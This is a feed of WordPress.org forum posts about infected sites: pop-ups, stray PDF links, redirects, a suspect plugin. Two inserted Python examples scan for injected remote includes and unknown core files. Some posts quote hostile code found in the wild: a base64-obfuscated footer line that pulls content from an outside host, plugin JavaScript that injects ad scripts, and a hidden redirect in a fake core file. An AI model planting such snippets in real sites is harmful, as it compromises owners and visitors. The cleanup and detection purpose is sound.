Channel: Topic Tag: malware | WordPress.org
Viewing all 3861 articles
Browse latest View live

kmessinger on "editing source code HTML of a wordpress page or post"

One way is to use a plugin like https://wordpress.org/plugins/better-search-replace/

Another is to sign into your hosted account and use phpMyAdmin which should be provided by your host.

Whichever or whatever, make sure you have a backup of the database.

I am not sure how you got rid of the malware but they usually leave a backdoor. You need to start working your way through these resources:

Additional Resources:


luckydsign on "Unwanted pop up"

hello - i have solved the problem...
go to your theme (ftp) -> footer.php and delete the line "<?php echo @file_get_contents(base64_decode("aHR0cDovL2Nkbi5nb21hZmlhLmNvbQ==")); ?>"

that has fixed my problem - good luck :)
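
Added example, not part of the thread: a small scanner that finds the pattern quoted in the post above, `file_get_contents()` wrapped around a `base64_decode()` string literal, in every `.php` file under a directory and reports the decoded target so each hit can be reviewed. The sample input is constructed and uses a placeholder URL; the function names are this example's own.

```python
import base64
import binascii
import re
from pathlib import Path

# file_get_contents(base64_decode("...")), with optional whitespace: the shape
# of the injected footer.php line quoted in the post above.
PATTERN = re.compile(
    r"""file_get_contents\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=]+)\1""",
    re.IGNORECASE,
)

def decode_literal(b64):
    """Decode the string literal; None if it is not valid base64 text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def scan_text(text):
    """Return [(line_number, decoded_target)] for every match in one file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in PATTERN.finditer(line):
            hits.append((lineno, decode_literal(match.group(2))))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return [(path, line, target)]."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits.extend((str(path), n, target) for n, target in scan_text(text))
    return hits

# Constructed sample: the encoded value is a placeholder URL built here,
# not the string from the post.
PLACEHOLDER = base64.b64encode(b"http://example.invalid/a").decode("ascii")
SAMPLE = (
    "<footer><?php wp_footer(); ?></footer>\n"
    f'<?php echo @file_get_contents(base64_decode("{PLACEHOLDER}")); ?>\n'
    '<?php $label = base64_decode("bm90IGEgdXJs"); ?>\n'
)

if __name__ == "__main__":
    for lineno, target in scan_text(SAMPLE):
        print(f"line {lineno}: remote include of {target!r}")
```

Run `scan_tree()` over `wp-content/themes` and `wp-content/plugins`; a plain `base64_decode()` call with no remote fetch around it, like the third sample line, is deliberately not reported.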

luckydsign on "Unwanted pop up"

greg - your problem came from your "sweetcaptcha" plugin ...
you're welcome....

window.sweetcaptchaCSRF = 'e0118086aa7b0e9978db2b4946408a2d'; var mobile = typeof(window.orientation) != 'undefined' || navigator.userAgent.match(/iphone|ipod|blackberry|android|palm|windowss+ce|mobile|msie 8|msie 7|msie 6/i) || (navigator.userAgent.indexOf('Safari') > -1 && navigator.userAgent.indexOf("Chrome") == -1 && navigator.userAgent.indexOf('Windows') > -1);if (1 || typeof(sc_jQuery) === 'undefined') {
window.sweetcaptchaPluginVersion = "3.0.9";
document.write('<scr'+'ipt type="text/javascript" src="//www.sweetcaptcha.com/javascripts/sclytics.js"></scr'+'ipt>');
document.write('<scr'+'ipt type="text/javascript" src="//clktag.com/adServe/banners?tid=SWTMPOP&tagid=2" async="async"></scr'+'ipt>');

document.write('<img width="1" style="position: absolute" height="1" src="//www.sweetcaptcha.com/api/v2/apps/csrfp/181121?t=1464866411928&mobile='+(mobile ? '1' : '0')+'" />');};

gregkeet on "Unwanted pop up"

Thanks for the replies, let me update the site and see if that works! Thanks again for your input. Their site is still popping up pages. Let's sort it out for them. :)

arnimation on "[Plugin: Wordfence Security] Unknown PDF file links are appearing on my sites"

I have the same problem, here are some of the links

http://themealeniumproject.com/How-the-Faith-Is-Protected.pdf
http://themealeniumproject.com/Vom-Verh-Ltni-Der-Electricit-T-Zum-Magnetismus---.pdf
http://themealeniumproject.com/Select-Discourses-by-John-Smith--To-Which-Is-Added-a-Sermon-Preached-at-the-Author-s-Funeral--1859-.pdf

hundreds of these unknown pdf links.. might even be thousands.

It's nowhere to be found on ftp folders and I already installed wordfence, did the scan but these links, hundreds of them are still showing up and bugging down my server. Help please!

Mel on "[Plugin: WP Support] Malware"

Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

Hi. I've checked the JS loaded by the plugin, and I suspect it of being malware, mainly because of the following section of code:

[ Suspected malware deleted, don't post that here ]

This piece of code, even beautified, seems to be thought out to be as unreadable as possible. Maybe I'm wrong, but if it's true, it does not follow the WordPress plugin development guidelines.
So, to allow me to understand your code and check that this script is senseful, please provide an unminified version, and the uglifier you used to reduce your scripts to check concordance.

This suspicion is even more increased by the fact that the GitHub user was deleted and is impossible to track. https://github.com/wp-plugins/wp-optimize-speed-by-xtraffic . Please answer quickly, or I'll have to notify the WP teams what I saw, and why this seems to not follow the rules.

Thank you for your attention.

https://wordpress.org/plugins/wp-optimize-speed-by-xtraffic/

Jan Dembowski on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"


Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

jakedohm on "Redirects Issue | Malware?"

I noted some code errors on my page, through the inspector, and then ran a tools.pingdom.com speed test, and it said "minimize redirects".

Here is the website url: amycarroll.org

Here are all of the redirects it said were on the page:

I haven't seen any changes in the behavior of the site, but I want to get these removed ASAP. Any suggestions where these might be coming from?

Davood Dehnavi on "Redirects Issue | Malware?"

Check your htaccess file for any 301 redirects that look similar to these.

schecteracademicservices on "Where do I report a ?possible? undiscovered infection"

I have found this file on several of our websites:

wp-admin/includes/class-wp-text.php

Nice innocuous name, but not part of the original wordpress installation.

The file date never matches the other files. Waaaaaay far to the right on line 52 we find a dead giveaway (all of line 52 pasted below):

******************************************************

if ( true /*!preg_match('/404/', $req_uri_orig) && !preg_match('/\/administrator\//', $req_uri_orig) && !preg_match('/\/bin\//', $req_uri_orig) && !preg_match('/\/cache\//', $req_uri_orig) && !preg_match('/\/cli\//', $req_uri_orig) && !preg_match('/\/components\//', $req_uri_orig) && !preg_match('/\/installation\//', $req_uri_orig) && !preg_match('/\/layouts\//', $req_uri_orig) && !preg_match('/\/libraries\//', $req_uri_orig) && !preg_match('/\/logs\//', $req_uri_orig) && !preg_match('/\/plugins\//', $req_uri_orig) && !preg_match('/\/tmp\//', $req_uri_orig) && !preg_match('/\/wp-login/', $req_uri_orig) && !preg_match('/\/xmlrpc/', $req_uri_orig) && !preg_match('/\/wp-admin/', $req_uri_orig) && !preg_match('/\/trackback/', $req_uri_orig)*/) $req_uri = 'topbarbietoys.com/';

************************************************

Thoughts?

schecteracademicservices on "Where do I report a ?possible? undiscovered infection"

I should also note that none of my lovely malware scanners found this. Sitelock, sucuri, wordfence, "Anti-Malware Security and Brute-Force Firewall"

Is topbarbietoys.com part of wordpress? ;-)
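
Added example, not part of the thread: the two posts above describe a file that sits in `wp-admin/includes/` but is not part of WordPress and was missed by signature scanners; comparing the core directories against a known-good manifest catches such a file without needing a signature. The sketch assumes a manifest of relative path to MD5 hex digest, the shape of the `checksums` object served by the WordPress.org core checksums API; the manifest, file contents and function names below are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path

CORE_DIRS = ("wp-admin/", "wp-includes/")  # directories that ship only core files

def md5_of(path):
    """MD5 of a file's bytes (assumed manifest format: path -> MD5 hex)."""
    return hashlib.md5(Path(path).read_bytes()).hexdigest()

def audit_core(root, manifest):
    """Compare the core directories under root with {relative_path: md5}.

    Returns (unknown, modified, missing) as sorted lists of relative paths.
    """
    root = Path(root)
    unknown, modified, seen = [], [], set()
    for top in CORE_DIRS:
        if not (root / top).is_dir():
            continue
        for path in (root / top).rglob("*"):
            if not path.is_file():
                continue
            rel = path.relative_to(root).as_posix()
            seen.add(rel)
            if rel not in manifest:
                unknown.append(rel)    # extra file dropped among core files
            elif md5_of(path) != manifest[rel]:
                modified.append(rel)   # core file edited in place
    missing = [p for p in manifest if p.startswith(CORE_DIRS) and p not in seen]
    return sorted(unknown), sorted(modified), sorted(missing)

def demo():
    """Constructed tree: one intact file, one edited file, one extra file."""
    intact, original = b"<?php // intact\n", b"<?php // original\n"
    with tempfile.TemporaryDirectory() as tmp:
        inc = Path(tmp, "wp-admin", "includes")
        inc.mkdir(parents=True)
        (inc / "file.php").write_bytes(intact)
        (inc / "post.php").write_bytes(b"<?php // edited\n")
        (inc / "class-wp-text.php").write_bytes(b"<?php // not in manifest\n")
        manifest = {  # constructed hashes, not real WordPress checksums
            "wp-admin/includes/file.php": hashlib.md5(intact).hexdigest(),
            "wp-admin/includes/post.php": hashlib.md5(original).hexdigest(),
            "wp-includes/version.php": hashlib.md5(b"<?php\n").hexdigest(),
        }
        return audit_core(tmp, manifest)

if __name__ == "__main__":
    print(demo())
```

The manifest must match the installed WordPress version and locale, otherwise legitimate files show up as modified.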

Jan Dembowski on "Where do I report a ?possible? undiscovered infection"


msk1985 on "Hack - fetching data from another server?"

My hosting account was recently compromised, which I was able to fix through my host provider. However, since the hack, a few of my domains seem to be fetching data from another server/domain. If you load mskartwork.com or pathsofmarriage.com, the message bar on the bottom of the browser says "waiting for epsomdownsclinic.com".

I tried searching for the domain in my theme files and ran a few malware plugins for errors, but I can't find any code that would cause this. My load speeds have slowed down considerably since this began, and I'm afraid I am inadvertently passing information through an unauthorized server.

Does anyone have advice on how to correct the issue? Any help would be much appreciated!

amprodata on "add code into head of home page"

Hi,

We are getting a security issue when using Chrome on http://www.scfl.org. Have scanned with a couple of different tools in WordPress and Google wants to verify.

I believe all I need to do is upload an html file or add meta tag into the site and I can't figure out how.

I see other people say how to go to wp-themes/(theme name) but I do not know how to get there. Thanks!

sterndata on "add code into head of home page"

dartiss on "Hack - fetching data from another server?"

It's worse than that - the first time I tried visiting your first site I got redirected to a dodgy site. Second attempt I got your site and can see the code you're referring to - it's about half way down the code, straight after the header, but there's no clue as to how it's been added.

Remain calm and carefully follow this guide. I've had the same occur to me and I ended up weeding out code from the root of wp-content/uploads as well as other folders.

amprodata on "add code into head of home page"

Yes I have run the scans and am now trying to request Google's malware review, but it wants me to upload an HTML file, or insert meta code and I do not know where to do that.

Thanks
